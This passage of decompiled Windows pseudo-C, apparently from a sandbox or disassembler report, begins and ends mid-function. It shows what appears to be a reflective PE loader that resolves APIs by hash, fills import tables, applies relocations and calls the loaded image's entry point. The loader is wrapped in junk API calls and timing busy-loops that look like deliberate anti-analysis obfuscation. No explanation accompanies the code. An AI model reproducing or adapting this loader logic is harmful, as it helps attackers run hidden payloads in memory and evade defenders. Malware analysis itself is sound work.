													asm("movsd xmm0, [ebp-0x188]");
													asm("movsd [ebp-0x50], xmm0");
													do {
														EmptyClipboard();
														asm("movss xmm0, [ebp-0x64]");
														E615A5C20(_t777, _t814);
														asm("cvttsd2si ecx, [ebp-0x34]");
														asm("movss [ebp-0x9c], xmm0");
														asm("movsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, [ebp-0x50]");
														asm("cvttsd2si esi, xmm0");
														_t777 = E615A5D90();
														E615D8E30(_t612, _t612);
														asm("movsd [ebp-0x34], xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														_t592 = E615A5C20(_t612, _t814);
														asm("movd xmm1, esi");
														asm("cvttss2si eax, xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														asm("cvtdq2ps xmm1, xmm1");
														asm("movd xmm2, eax");
														asm("subss xmm0, xmm1");
														asm("movss [ebp-0x64], xmm1");
														asm("cvtdq2pd xmm2, xmm2");
														asm("cvtps2pd xmm0, xmm0");
														asm("movsd [ebp-0x50], xmm2");
														asm("addsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, xmm2");
														asm("cvtpd2ps xmm2, xmm0");
														asm("comiss xmm2, [ebp-0x100]");
													} while (__eflags >= 0);
													goto L95;
												}
												_t615 =  *_t777 + _t872;
												_v200 = _t615;
												_v320 = _t615;
												goto L109;
											}
											__eflags = _t814 - _v60;
											if(_t814 > _v60) {
												_t617 =  *_t777 + _t872;
												_v236 = _t617;
												_v316 = _t617;
											}
											goto L109;
										}
										_t618 = _t814 + _t814;
										_v136 = _t618;
										while(1) {
											_v80 = _t871;
											__eflags = _t618 - _t776;
											if(_t618 >= _t776) {
												break;
											}
											asm("ucomiss xmm2, [ebp-0x104]");
											asm("lahf");
											__eflags = _t618 & 0x00000044;
											if(__eflags == 0) {
												_t632 = TlsAlloc();
												_t814 = 0;
												__eflags = 0;
												E615D8E30(_t632, 0x126);
												asm("cvtsd2ss xmm0, xmm0");
												asm("cvttss2si ecx, xmm0");
												E615A5D90();
											}
											asm("movss xmm1, [ebp-0x128]");
											do {
												asm("movd xmm0, eax");
												_t623 = 1;
												asm("cvtdq2ps xmm0, xmm0");
												asm("divss xmm1, xmm0");
												asm("comiss xmm1, [ebp-0x12c]");
											} while (__eflags >= 0);
											asm("ucomiss xmm1, [ebp-0xf4]");
											asm("lahf");
											__eflags = 0;
											if(0 != 0) {
												E615D8E30(E615A5EE0(4, _t814), _t624);
												asm("movsd [ebp-0x68], xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												_t626 = E615A5C20(_t624, _t814);
												asm("cvttss2si eax, xmm0");
												asm("movsd xmm0, [ebp-0x180]");
												_t623 = _t626;
												asm("movd xmm1, eax");
												asm("cvtdq2pd xmm1, xmm1");
												asm("mulsd xmm1, [ebp-0x68]");
												asm("subsd xmm0, xmm1");
											} else {
												asm("movsd xmm0, [ebp-0xd4]");
												asm("divsd xmm0, xmm0");
											}
											asm("cvtpd2ps xmm2, xmm0");
											asm("movss xmm0, [ebp-0x130]");
											asm("ucomiss xmm2, [ebp-0x78]");
											asm("movss [ebp-0x44], xmm0");
											asm("movss xmm0, [ebp-0xf8]");
											asm("lahf");
											asm("movss [ebp-0x24], xmm2");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x64], xmm0");
											__eflags = _t623 & 0x00000044;
											if((_t623 & 0x00000044) != 0) {
												L82:
												_t871 = _t871 + 1;
												__eflags = _v80 - _v112;
												_t618 = _v136;
												_t776 = _v60;
												if(_v80 >= _v112) {
													continue;
												}
												_t814 = _v44;
												goto L84;
											} else {
												_t909 = __imp__CoFreeUnusedLibraries;
												do {
													_t628 =  *_t909();
													asm("movss xmm0, [ebp-0x64]");
													asm("divss xmm0, [ebp-0x44]");
													E615D8E30(E615D8AFE(_t628), _t629);
													asm("movss xmm1, [ebp-0x44]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("addss xmm1, xmm0");
													asm("movss [ebp-0x1c], xmm0");
													asm("movaps xmm0, xmm1");
													asm("movss [ebp-0x44], xmm1");
													_t631 = E615A5C20(_t629, _t814);
													asm("movss xmm2, [ebp-0x1c]");
													asm("subss xmm2, [ebp-0x44]");
													asm("movss [ebp-0x64], xmm0");
													asm("addss xmm2, xmm0");
													asm("ucomiss xmm2, [ebp-0x78]");
													asm("movss [ebp-0x1c], xmm2");
													asm("movss [ebp-0x24], xmm2");
													asm("lahf");
													__eflags = _t631 & 0x00000044;
												} while ((_t631 & 0x00000044) != 0);
												_t907 = _v52;
												goto L82;
											}
										}
										_t872 = _v48;
										_t814 = _v44;
										_t777 =  *((intOrPtr*)(_v244 + 0x1c)) + ( *_v152 & 0x0000ffff) * 4 + _t872;
										_v100 = _t777;
										_v312 = _t777;
										goto L85;
									}
									__eflags = _t907 - 0x7c0dfcaa;
									if(_t907 == 0x7c0dfcaa) {
										goto L68;
									}
									__eflags = _t907 - 0x91afca54;
									if(_t907 != 0x91afca54) {
										goto L110;
									}
									goto L68;
								}
							}
							_v120 = 3;
							_t906 =  *(_v68 + 0x10);
							_v48 = _t906;
							_v240 = _t906;
							_t797 =  *((intOrPtr*)( *((intOrPtr*)(_t906 + 0x3c)) + _t906 + 0x78));
							_t798 = _t797 + _t906;
							_v244 = _t798;
							_t583 =  *((intOrPtr*)(_t797 + _t906 + 0x20)) + _t906;
							_v296 = _t798;
							_t774 =  *((intOrPtr*)(_t798 + 0x24)) + _t906;
							_v152 = _t774;
							goto L63;
						}
						_t879 = 1;
						do {
							__imp__GetTickCount64();
							asm("movsd xmm1, [ebp-0x178]");
							_t879 = _t879 + 1;
							__eflags = _t879;
							asm("movd xmm0, esi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("comisd xmm1, xmm0");
						} while (_t879 >= 0);
						asm("movsd xmm0, [0x615e97c0]");
						asm("movsd [ebp-0x90], xmm0");
						asm("movsd xmm0, [0x615e9648]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						while(1) {
							_t691 = _v44;
							asm("movss xmm1, [0x615e977c]");
							asm("cdq");
							_t815 = _v60;
							_t453 = _t691 - _t814 >> 1;
							_v52 = _t453;
							__eflags = _t453 - _t815;
							if(__eflags >= 0) {
								break;
							}
							asm("comiss xmm1, xmm0");
							if(__eflags < 0) {
								_t559 = E615D8E30(AreFileApisANSI(), 0x64);
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm0, [ebp-0x78]");
								_t560 = E615D8AFE(_t559);
								_t562 = E615D8E30(E615A5D90(), _t561);
								asm("movsd [ebp-0xe4], xmm0");
								_t563 = E615D8E30(_t562, _t560);
								asm("movss xmm1, [ebp-0x78]");
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm1, xmm0");
								asm("movaps xmm0, xmm1");
								_t565 = E615D8E30(E615D8AFE(_t563), _t564);
								asm("movsd xmm2, [ebp-0xe4]");
								asm("movaps xmm1, xmm0");
								asm("movaps xmm0, xmm2");
								_t814 = 0;
								asm("divsd xmm0, xmm1");
								asm("mulsd xmm2, xmm1");
								asm("cvtpd2ps xmm0, xmm0");
								asm("cvtps2pd xmm0, xmm0");
								asm("mulsd xmm0, xmm2");
								asm("movsd [ebp-0xe4], xmm0");
								E615D8E30(_t565, _t560);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("addsd xmm1, xmm0");
								asm("cvtpd2ps xmm0, xmm1");
							} else {
								_t568 = E615D8E30(TlsAlloc(), 0x48);
								asm("divsd xmm0, [ebp-0x90]");
								_t569 = E615D8CDF(_t568);
								asm("sbb eax, edx");
								_t814 = 0;
								E615D8E30(0, 0xc8 - _t569);
								asm("movsd [ebp-0xe4], xmm0");
								E615D8E30(E615A5D90(), _t572);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("subsd xmm1, xmm0");
								asm("subsd xmm1, [ebp-0xb4]");
								asm("cvtpd2ps xmm0, xmm1");
							}
						}
						_t844 = _v188;
						asm("movss [ebp-0x1c], xmm0");
						_t455 =  *((intOrPtr*)(_t844 + 0x3c)) + _t844;
						_v96 = _t455;
						_t880 =  *(_t455 + 0x54);
						_t456 = _v48;
						_v36 = _t456;
						__eflags = _t880;
						if(_t880 == 0) {
							L132:
							asm("movsd xmm0, [0x615e96c0]");
							_t881 = 1;
							asm("movsd [ebp-0x10c], xmm0");
							do {
								__imp__GetTickCount64();
								asm("movsd xmm1, [ebp-0x10c]");
								_t881 = _t881 + 1;
								__eflags = _t881;
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("comisd xmm1, xmm0");
							} while (_t881 >= 0);
							_t882 = __imp__GetThreadErrorMode;
							asm("movss xmm1, [0x615e9758]");
							asm("movss xmm0, [ebp-0x1c]");
							_t845 = _v52;
							while(1) {
								L135:
								asm("movss xmm2, [0x615e9740]");
								while(1) {
									__eflags = _t845 - _v60;
									if(_t845 >= _v60) {
										break;
									}
									asm("ucomiss xmm0, xmm1");
									asm("movss [ebp-0x7c], xmm2");
									asm("lahf");
									__eflags = _t456 & 0x00000044;
									if((_t456 & 0x00000044) != 0) {
										continue;
									} else {
										goto L138;
									}
									do {
										L138:
										 *_t882();
										asm("movss xmm0, [ebp-0x7c]");
										_t557 = E615A5C20(_t691, _t815);
										asm("movss xmm2, [ebp-0x7c]");
										asm("movaps xmm1, xmm0");
										asm("divss xmm2, xmm2");
										asm("mulss xmm1, xmm0");
										asm("movss [ebp-0x7c], xmm2");
										asm("cvttss2si eax, xmm1");
										_t456 = _t557;
										asm("movd xmm1, eax");
										asm("cvtdq2ps xmm1, xmm1");
										asm("mulss xmm1, xmm2");
										asm("subss xmm0, xmm1");
										asm("movss xmm1, [0x615e9758]");
										asm("ucomiss xmm0, xmm1");
										asm("movss [ebp-0x1c], xmm0");
										asm("lahf");
										__eflags = _t456 & 0x00000044;
									} while ((_t456 & 0x00000044) != 0);
									goto L135;
								}
								__imp__GetTickCount64();
								__imp__GetTickCount64();
								_v80 = _t456;
								_v52 = _t815;
								E615D8DF0(E615D81A0(_t456, _t815, 0x2710, 0), _t457, _t815);
								asm("mulsd xmm0, [ebp-0x170]");
								asm("movsd [ebp-0x88], xmm0");
								E615D8DF0(E615D81A0(_v80, _v52, 0x2710, 0), _t459, _t815);
								asm("mulsd xmm0, [ebp-0xdc]");
								_t461 = _v96;
								asm("movsd xmm1, [ebp-0x88]");
								asm("addsd xmm1, xmm0");
								_t848 = ( *(_t461 + 0x14) & 0x0000ffff) + _t461;
								_t462 =  *(_t461 + 6) & 0x0000ffff;
								asm("mulsd xmm1, [ebp-0xac]");
								asm("divsd xmm1, [0x615e9590]");
								asm("movsd [ebp-0x88], xmm1");
								__eflags = _t462;
								if(_t462 == 0) {
									L154:
									asm("movsd xmm0, [0x615e9570]");
									_t884 = 1;
									asm("movsd [ebp-0x50], xmm0");
									asm("movsd [ebp-0x34], xmm0");
									asm("movsd xmm0, [0x615e9568]");
									asm("movsd [ebp-0xdc], xmm0");
									asm("movsd xmm0, [0x615e9550]");
									asm("movsd [ebp-0x90], xmm0");
									do {
										__imp__GetTickCount64();
										asm("movsd xmm0, [ebp-0x34]");
										asm("subsd xmm0, [ebp-0xdc]");
										asm("mulsd xmm0, [ebp-0xac]");
										asm("addsd xmm0, [ebp-0x170]");
										asm("movsd [ebp-0x34], xmm0");
										_t462 = E615D8DF0(E615D81A0(_t462, _t815, 0x2710, 0), _t463, _t815);
										asm("movsd xmm1, [ebp-0x34]");
										_t884 = _t884 + 1;
										__eflags = _t884;
										asm("mulsd xmm1, xmm0");
										asm("movd xmm0, esi");
										asm("cvtdq2pd xmm0, xmm0");
										asm("mulsd xmm1, [ebp-0x90]");
										asm("movsd [ebp-0x34], xmm0");
										asm("addsd xmm1, [ebp-0x88]");
										asm("movsd [ebp-0x88], xmm1");
										asm("movsd xmm1, [ebp-0x178]");
										asm("comisd xmm1, xmm0");
									} while (_t884 >= 0);
									_t695 = _v44;
									_t464 = _t695 + 4;
									__eflags = _t464 - _v156;
									_t886 =  >  ? _t695 : _v112;
									_t697 = _v96 - 0xffffff80;
									_v44 = _t886;
									_v72 = _t697;
									_t850 =  *_t697 + _v48;
									_v8 = 0xffffffff;
									asm("movsd xmm0, [0x615e9688]");
									asm("movsd xmm1, [0x615e9608]");
									asm("movsd [ebp-0x168], xmm0");
									asm("movsd [ebp-0xdc], xmm1");
									while(1) {
										L157:
										asm("movss xmm1, [ebp-0x1c]");
										_v40 = _t850;
										while(1) {
											asm("movss xmm0, [0x615e96d0]");
											asm("movss xmm3, [0x615e96bc]");
											asm("movss xmm2, [0x615e9790]");
											while(1) {
												L159:
												__eflags =  *(_t850 + 0xc);
												if( *(_t850 + 0xc) == 0) {
													break;
												}
												__eflags =  *_t697;
												if( *_t697 == 0) {
													break;
												}
												_t858 = _v60;
												while(1) {
													__eflags = _t886 - _t858;
													if(__eflags != 0) {
														break;
													}
													asm("comiss xmm0, xmm1");
													_t739 = 0x69;
													_t819 = 0x4f;
													if(__eflags <= 0) {
														L167:
														asm("ucomiss xmm1, xmm2");
														asm("movss [ebp-0x20], xmm3");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags != 0) {
															L171:
															asm("comiss xmm1, xmm0");
															if(__eflags >= 0) {
																_t501 = E615D8E30(E615A5EE0(0x16, _t819), _t500);
																asm("movaps xmm1, xmm0");
																asm("movsd [ebp-0x90], xmm0");
																asm("addsd xmm1, [ebp-0xdc]");
																asm("movss xmm0, [ebp-0xa4]");
																asm("cvtsd2ss xmm1, xmm1");
																asm("cvtss2sd xmm1, xmm1");
																asm("movsd [ebp-0xe4], xmm1");
																_t464 = E615D8E30(E615D8AFE(_t501), _t502);
																asm("mulsd xmm0, [ebp-0x90]");
																asm("movsd xmm1, [ebp-0xe4]");
																asm("movss xmm2, [0x615e9790]");
																asm("movss xmm3, [0x615e96bc]");
																asm("addsd xmm1, xmm0");
																asm("movss xmm0, [0x615e96d0]");
																asm("cvtpd2ps xmm1, xmm1");
															}
															continue;
														}
														do {
															_t503 = DestroyCaret();
															asm("movss xmm0, [ebp-0x20]");
															_t464 = E615D8AFE(_t503);
															_push(_t819);
															_push(_t464);
															E615A5A30();
															asm("movss xmm2, [0x615e9790]");
															_t914 = _t914 + 8;
															asm("cvtsd2ss xmm0, xmm0");
															asm("ucomiss xmm0, xmm2");
															asm("movss [ebp-0x20], xmm0");
															asm("movaps xmm1, xmm0");
															asm("lahf");
															__eflags = _t464 & 0x00000044;
														} while (__eflags != 0);
														asm("movss xmm0, [0x615e96d0]");
														asm("movss xmm3, [0x615e96bc]");
														goto L171;
													}
													_t900 = 0x4f;
													do {
														_t739 = _t739 * _t900;
														_t819 = _t819 + _t819;
														_t900 = _t819;
														_t464 = _t739 - _t900;
														__eflags = _t464;
														asm("movd xmm1, eax");
														asm("cvtdq2ps xmm1, xmm1");
														asm("comiss xmm0, xmm1");
													} while (_t464 > 0);
													_t886 = _v44;
													goto L167;
												}
												_t859 = _v40;
												asm("movss [ebp-0x1c], xmm1");
												_t815 = _v236( *((intOrPtr*)(_t859 + 0xc)) + _v48);
												_t498 =  *_t859 + _v48;
												_t860 = _v48;
												_t718 =  *((intOrPtr*)(_t859 + 0x10)) + _t860;
												__eflags = _t718;
												_v92 = _t815;
												_v68 = _t718;
												while(1) {
													_t719 =  *_t718;
													_v76 = _t498;
													__eflags = _t719;
													if(_t719 == 0) {
														break;
													}
													__eflags = _t498;
													if(_t498 == 0) {
														L179:
														__eflags = _t886 + _t886 - _v60;
														if(__eflags < 0) {
															asm("movss xmm1, [0x615e9668]");
															asm("comiss xmm1, [ebp-0x1c]");
															if(__eflags <= 0) {
																GetForegroundWindow();
																asm("movss xmm0, [0x615e972c]");
																_t520 = E615A5C20(_t719, _t815);
																asm("cvttss2si eax, xmm0");
																_t521 = _t520;
															} else {
																GetDialogBaseUnits();
																_t521 = 0x78;
															}
															asm("movd xmm0, eax");
															_t864 = 0x2a;
															asm("cvtdq2ps xmm0, xmm0");
															_v144 = 0;
															asm("comiss xmm0, [0x615e96d4]");
															asm("movss [ebp-0x1c], xmm0");
															if(__eflags < 0) {
																L187:
																asm("movss xmm1, [0x615e96a8]");
																asm("comiss xmm1, xmm0");
																if(__eflags > 0) {
																	_push(0);
																	_push(0x13);
																	E615A5A30();
																	asm("cvttsd2si eax, xmm0");
																	_t914 = _t914 + 8;
																	asm("movd xmm0, eax");
																	asm("cvtdq2ps xmm0, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																}
																asm("ucomiss xmm0, [0x615e970c]");
																asm("movss xmm1, [ebp-0xc8]");
																asm("movss [ebp-0x20], xmm1");
																asm("lahf");
																__eflags = _t521 & 0x00000044;
																if((_t521 & 0x00000044) != 0) {
																	L192:
																	_t822 = _v68;
																	L193:
																	_t860 = _v48;
																	L194:
																	__eflags = _t886 + 4 - _v156;
																	_v8 = 0xffffffff;
																	_t728 =  >  ? _t886 : _v112;
																	_t823 = _t822 + 4;
																	_t886 =  >  ? _t886 : _v112;
																	_v68 = _t823;
																	_t729 = _v76;
																	__eflags = _t729;
																	_t498 =  ==  ? _t729 : _t729 + 4;
																	_t718 = _t823;
																	_t815 = _v92;
																	continue;
																} else {
																	asm("movsd xmm0, [ebp-0x168]");
																	asm("movsd [ebp-0xb4], xmm0");
																	do {
																		__imp__GetSystemDefaultUILanguage();
																		asm("movss xmm0, [ebp-0x20]");
																		asm("addss xmm0, xmm0");
																		asm("movss [ebp-0x20], xmm0");
																		asm("cvtps2pd xmm0, xmm0");
																		asm("mulsd xmm0, [ebp-0xb4]");
																		asm("movsd [ebp-0xb4], xmm0");
																		asm("cvtpd2ps xmm0, xmm0");
																		asm("ucomiss xmm0, [0x615e970c]");
																		asm("movss [ebp-0x1c], xmm0");
																		asm("lahf");
																		__eflags = _t521 & 0x00000044;
																	} while ((_t521 & 0x00000044) != 0);
																	goto L192;
																}
															} else {
																_t320 = _t864 + 0x2e; // 0x58
																_t524 = E615D8E30(_t521, _t320);
																asm("cvtsd2ss xmm0, xmm0");
																_t321 = _t864 - 0x29; // 0x1
																asm("movss [ebp-0x20], xmm0");
																E615D8E30(_t524, _t321);
																asm("cvtsd2ss xmm0, xmm0");
																asm("movss [ebp-0x30], xmm0");
																do {
																	IsSystemResumeAutomatic();
																	_t528 = E615D8E30(E615A5D90(), _t527);
																	asm("movss xmm1, [ebp-0x20]");
																	_t864 = 1;
																	asm("cvtsd2ss xmm0, xmm0");
																	_v144 = 0;
																	asm("subss xmm1, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																	asm("movaps xmm0, xmm1");
																	_t521 = E615D8E30(E615D8AFE(_t528), _t529);
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [ebp-0x1c]");
																	asm("divss xmm0, [ebp-0x30]");
																	asm("movss [ebp-0x20], xmm1");
																	asm("mulss xmm0, xmm1");
																	asm("comiss xmm0, [0x615e96d4]");
																	asm("movss [ebp-0x1c], xmm0");
																} while (__eflags >= 0);
																goto L187;
															}
														}
														_t531 = _t719 + _t860;
														_v72 = _t531;
														_t533 = _v200(_t815, _t531 + 2);
														_t822 = _v68;
														 *_t822 = _t533;
														goto L194;
													}
													_t865 =  *_t498;
													__eflags = _t865;
													if(_t865 >= 0) {
														_t860 = _v48;
														goto L179;
													}
													asm("cdq");
													_t826 = _v92;
													__eflags = _t886 - _t815 >> 1 - _v156;
													_t736 =  >=  ? _t886 : _v112;
													_t886 =  >=  ? _t886 : _v112;
													_t822 = _v68;
													 *_t822 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x1c)) + ((_t865 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x10))) * 4 + _t826)) + _t826;
													goto L193;
												}
												_t464 = _t886 + 4;
												_v44 = _t886;
												__eflags = _t464 - _v60;
												if(__eflags <= 0) {
													asm("movss xmm0, [0x615e9770]");
													asm("movss xmm1, [0x615e9690]");
													asm("movss [ebp-0x60], xmm0");
													asm("movss xmm0, [ebp-0x1c]");
													asm("comiss xmm1, xmm0");
													if(__eflags <= 0) {
														L200:
														asm("ucomiss xmm0, [0x615e971c]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movss xmm0, [0x615e9724]");
															_t509 = E615D8AFE(_t464);
															_push(_t815);
															_push(_t509);
															E615A5A30();
															asm("cvtsd2ss xmm0, xmm0");
															_t914 = _t914 + 8;
															asm("addss xmm0, [ebp-0xcc]");
															_t510 = E615D8AFE(_t509);
															_v144 = _t815;
															_t464 = E615A5EE0(_t510, _t815);
														}
														asm("movss xmm1, [ebp-0x18]");
														do {
															asm("movaps xmm0, xmm1");
															asm("addss xmm1, xmm0");
															asm("comiss xmm1, [0x615e9678]");
														} while (__eflags >= 0);
														asm("ucomiss xmm1, [0x615e973c]");
														asm("movss [ebp-0x1c], xmm1");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if((_t464 & 0x00000044) == 0) {
															asm("movss xmm0, [0x615e97b8]");
															_t464 = E615D8E30(E615D8AFE(_t464), _t508);
															asm("xorps xmm1, xmm1");
															asm("cvtsd2ss xmm1, xmm0");
															asm("movaps xmm0, xmm1");
															asm("mulss xmm0, [0x615e97a8]");
															asm("subss xmm1, xmm0");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("ucomiss xmm1, [0x615e96a4]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movsd xmm0, [ebp-0xc0]");
															_t504 = E615D8CDF(_t464);
															_push(_t815);
															_push(_t504);
															E615A5A30();
															asm("cvttsd2si eax, xmm0");
															_t914 = _t914 + 8;
															asm("cdq");
															_t898 = _t815;
															_t815 = 0;
															_t351 = _t815 + 0x51; // 0x51
															_t505 = E615D8E30(_t504, _t351);
															asm("cvtsd2ss xmm0, xmm0");
															asm("subss xmm0, [0x615e9704]");
															_t464 = E615D8E30(E615D85B0(E615D8AFE(_t505), 0, _t504, _t898), _t507);
															asm("cvtsd2ss xmm0, xmm0");
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd xmm0, [ebp-0x50]");
															asm("divsd xmm0, [ebp-0xd4]");
															asm("mulsd xmm1, xmm0");
															asm("cvtpd2ps xmm1, xmm1");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("movss xmm0, [0x615e96fc]");
														asm("movss xmm2, [0x615e9790]");
														asm("movss xmm3, [0x615e96bc]");
														_t886 = _v44;
														_t850 = _v40;
														_t697 = _v72;
														asm("movss [ebp-0x20], xmm0");
														asm("movss xmm0, [0x615e9678]");
														asm("comiss xmm0, xmm1");
														asm("movss xmm0, [0x615e96d0]");
														if(__eflags > 0) {
															do {
																_t464 = GetSystemDefaultLangID();
																asm("movss xmm1, [ebp-0x20]");
																asm("movss xmm2, [0x615e9678]");
																asm("movaps xmm0, xmm1");
																asm("addss xmm0, xmm1");
																asm("comiss xmm2, xmm0");
																asm("movaps xmm1, xmm0");
																asm("movss [ebp-0x20], xmm0");
																asm("movss [ebp-0x1c], xmm1");
															} while (__eflags > 0);
															_t886 = _v44;
															_t850 = _v40;
															_t697 = _v72;
															asm("movss xmm0, [0x615e96d0]");
															asm("movss xmm3, [0x615e96bc]");
															asm("movss xmm2, [0x615e9790]");
														}
														continue;
													}
													_t511 = E615D8E30(_t464, 1);
													asm("cvtsd2ss xmm0, xmm0");
													_t821 = 0;
													__eflags = 0;
													_t343 = _t821 + 2; // 0x2
													_t725 = _t343;
													asm("movss [ebp-0x20], xmm0");
													_t512 = E615D8E30(_t511, _t343);
													asm("movss xmm1, [ebp-0x60]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("movss [ebp-0x54], xmm0");
													do {
														asm("movss xmm0, [ebp-0x20]");
														asm("subss xmm0, xmm1");
														_t513 = E615D8AFE(_t512);
														asm("movss xmm0, [ebp-0x60]");
														E615A5C20(_t725, _t821);
														asm("movss [ebp-0x60], xmm0");
														asm("movss xmm0, [ebp-0x54]");
														_t517 = E615D8E30(E615D8AFE(E615A5C20(_t725, _t821)), _t516);
														asm("cvtsd2ss xmm0, xmm0");
														_t725 = _t513;
														asm("movss [ebp-0x54], xmm0");
														_t512 = E615D8E30(_t517, _t513);
														asm("movss xmm1, [ebp-0x60]");
														asm("movss xmm2, [0x615e9690]");
														asm("cvtsd2ss xmm0, xmm0");
														asm("mulss xmm0, xmm1");
														asm("mulss xmm0, [ebp-0x54]");
														asm("addss xmm0, [ebp-0x20]");
														asm("comiss xmm2, xmm0");
													} while (__eflags > 0);
													goto L200;
												}
												_t697 = _v72;
												_t850 = _v40 + 0x14;
												goto L157;
											}
											asm("movsd xmm0, [ebp-0x50]");
											_t851 = 1;
											_t887 = __imp__GetTickCount64;
											asm("movsd [ebp-0xd4], xmm0");
											asm("movsd xmm0, [0x615e9548]");
											asm("movsd [ebp-0xb4], xmm0");
											do {
												_t465 =  *_t887();
												asm("movsd xmm0, [ebp-0xd4]");
												asm("mulsd xmm0, [ebp-0xac]");
												asm("addsd xmm0, [ebp-0x170]");
												asm("movsd [ebp-0xd4], xmm0");
												E615D8DF0(E615D81A0(_t465, _t815, 0x2710, 0), _t466, _t815);
												asm("movsd xmm1, [ebp-0xd4]");
												_t851 = _t851 + 1;
												__eflags = _t851;
												asm("mulsd xmm1, xmm0");
												asm("movsd xmm0, [ebp-0x88]");
												asm("mulsd xmm1, [ebp-0xb4]");
												asm("addsd xmm0, xmm1");
												asm("movsd xmm1, [ebp-0x10c]");
												asm("movsd [ebp-0x88], xmm0");
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
												asm("movsd [ebp-0xd4], xmm0");
											} while (_t851 >= 0);
											_t468 = _v96;
											_t699 = _v48;
											_t888 = _v44;
											_t853 = _t699 -  *((intOrPtr*)(_t468 + 0x34));
											__eflags =  *(_t468 + 0xa4);
											_v52 = _t853;
											if( *(_t468 + 0xa4) == 0) {
												L245:
												_t889 = 1;
												do {
													__imp__GetTickCount64();
													asm("movsd xmm0, [ebp-0x50]");
													asm("mulsd xmm0, [ebp-0xac]");
													asm("addsd xmm0, [ebp-0x170]");
													asm("movsd [ebp-0x50], xmm0");
													_t468 = E615D8DF0(E615D81A0(_t468, _t815, 0x2710, 0), _t469, _t815);
													asm("movsd xmm1, [ebp-0x50]");
													_t889 = _t889 + 1;
													__eflags = _t889;
													asm("mulsd xmm1, xmm0");
													asm("movsd xmm0, [ebp-0x88]");
													asm("mulsd xmm1, [ebp-0xb4]");
													asm("addsd xmm0, xmm1");
													asm("movsd xmm1, [ebp-0x10c]");
													asm("movsd [ebp-0x88], xmm0");
													asm("movd xmm0, esi");
													asm("cvtdq2pd xmm0, xmm0");
													asm("comisd xmm1, xmm0");
													asm("movsd [ebp-0x50], xmm0");
												} while (_t889 >= 0);
												_t854 = _v48;
												 *0x615f1484 = _t854;
												_t891 =  *((intOrPtr*)(_v96 + 0x28)) + _t854;
												_v8 = 0xffffffff;
												__eflags = _v444;
												if(_v444 != 0) {
													_t471 =  *_t891(_v412, 1, 0); // executed
													L255:
													asm("movsd xmm0, [ebp-0x88]");
													E615D8CC1(_t471);
													L253:
													 *[fs:0x0] = _v16;
													__eflags = _v24 ^ _t912;
													return E615B4D4A(_v24 ^ _t912);
												}
												_t471 = E615A6550(_t854, _v440);
												_v52 = _t471;
												__eflags = _t471;
												if(_t471 == 0) {
													goto L255;
												}
												__eflags = _v416;
												if(_v416 == 0) {
													_t856 = _v412;
												} else {
													_t856 = _v412;
													E615A6510(_t856, _t854);
												}
												 *_t891(_t856, 1, 0);
												_v52(_v432, _v428, _v424, _v420);
												goto L253;
											}
											asm("movss xmm1, [ebp-0x1c]");
											__eflags = _t888 - _v60;
											if(__eflags == 0) {
												asm("comiss xmm1, [ebp-0x78]");
												_t893 = 0x37;
												if(__eflags < 0) {
													L221:
													_t468 = _v40;
													asm("o16 nop [eax+eax]");
													while(1) {
														L222:
														_t707 =  *(_t468 + 4);
														__eflags = _t707;
														if(_t707 == 0) {
															goto L245;
														}
														_t370 = _t468 + 8; // 0x100000007
														_t894 = _t370;
														_t815 =  *_t468 + _v48;
														_t709 = _t707 + 0xfffffff8 >> 1;
														__eflags = _t709;
														while(1) {
															_v36 = _t894;
															_t710 = _t709 - 1;
															__eflags = _t709;
															_t479 = _v44;
															_v52 = _t709 - 1;
															if(_t709 == 0) {
																break;
															}
															__eflags = _t479 + 4 - _v156;
															_t486 =  *_t894 & 0x0000ffff;
															_t712 =  >  ? _v44 : _v112;
															_t896 = _t486 >> 0xc;
															_v44 =  >  ? _v44 : _v112;
															_t713 = _t486;
															__eflags = _t896 - 0xa;
															if(_t896 != 0xa) {
																__eflags = _t896 - 3;
																if(_t896 != 3) {
																	__eflags = _t896 - 1;
																	if(_t896 != 1) {
																		__eflags = _t896 - 2;
																		if(_t896 == 2) {
																			_t714 = _t713 & 0x00000fff;
																			_t385 = _t714 + _t815;
																			 *_t385 =  *(_t714 + _t815) + _t853;
																			__eflags =  *_t385;
																		}
																	} else {
																		 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + (_t853 >> 0x10);
																	}
																} else {
																	 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + _t853;
																}
															} else {
																 *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) + _t853;
